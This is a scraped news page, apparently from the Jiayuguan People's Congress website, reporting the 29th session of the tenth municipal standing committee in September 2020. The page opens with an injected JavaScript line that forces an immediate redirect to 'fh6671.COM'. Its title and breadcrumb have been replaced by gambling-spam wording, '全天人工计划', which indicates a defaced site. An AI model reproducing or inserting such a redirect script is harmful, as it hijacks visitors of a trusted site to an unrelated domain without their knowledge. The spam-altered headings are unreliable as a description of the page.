function jumurl(){ window.location.href = 'fh6671.COM' } setTimeout(jumurl,2000); jumurl();

全天人工计划


欢迎您登录嘉峪关人大网站!
当前位置:全天人工计划  >>  新工作动态  >>  会议专栏  >>  常委会会议  
市十届人大常委会第二十九次会议召开
来源: 嘉峪关日报      日期: 2020-09-18      作者: 朱玲      点击数:

市十届人大常委会第二十九次会议召开

王进平主持并讲话

       嘉峪关日报讯(记者朱玲)9月17日,市十届人大常委会第二十九次会议召开。市人大常委会党组书记、主任王进平主持会议并讲话。

       会议应到常委会组成人员24名,实到19名,符合法定人数。

       市人大常委会副主任、一级巡视员王万平,市人大常委会副主任唐晓东、韩峻峰、荔瑾及秘书长、办公室二级巡视员赵大鹏出席会议。

       会议首先表决通过了本次会议议程。

       会议听取审议了《市政府关于2019年度市级预算执行和其他财政收支情况的审计工作报告》《市政府关于调整市级财政2020年债券收支预算情况的报告》《市政府关于2019年度国有资产管理情况的报告》《市政府2019年度行政事业性国有资产管理情况的报告》《市中级人民法院充分发挥审判职能营造法治化营商环境工作情况的报告》以及市人大常委会执法检查组关于《嘉峪关市市容和环境卫生管理条例》执法检查报告;听取审议了《嘉峪关市养犬管理条例(草案)》《嘉峪关市人民代表大会常务委员会人事任免办法(修订稿)》;审议通过了《嘉峪关市人民代表大会常务委员会关于加强检察公益诉讼工作的决定》《嘉峪关市人民代表大会常务委员会关于准予<嘉峪关市中心城区酒钢工业片区控制性详细规划>备案的决定》;会议还通过了人事任免事项,为新任命的 干部颁发了任命书。

       就做好市人大常委会近期工作,王进平强调,要深入贯彻落实即将召开的党的十九届五中全会精神,动员全市各级人大代表、人大系统工作人员更加紧密地团结在以习近平同志为核心的党中央周围,牢记嘱托、赶超奋进。要深入宣传贯彻实施民法典,广泛开展普法教育,促进社会文明、和谐、稳定。要深入贯彻落实市委十一届十四次全会精神,健全完善市人大及其常委会议事规则和各项制度。要全面落实中央、省委、市委决策部署,持续发力、多管齐下,为高质量发展保驾护航。要加强对外新闻宣传工作,提高宣传水平,扩大宣传效果,营造良好的舆论氛围。要加强自身建设,按照新时代党的建设总要求,全面落实从严治党主体责任,严格落实党风廉政建设责任制、意识形态工作责任制。要带头贯彻落实习近平总书记关于制止餐饮浪费行为的重要指示精神,共同培养文明、健康、绿色、节约的生活方式。

       市委常委、常务副市长王毅,市中级人民法院院长茹作勋,市人民检察院检察长蔡玉霞及市纪委(监委)相关负责人,市人大代表、有关单位和部门负责人,市人大各专委会、常委会各部门负责人列席会议。

       会后,新任命的国家机关工作人员进行了宪法宣誓仪式。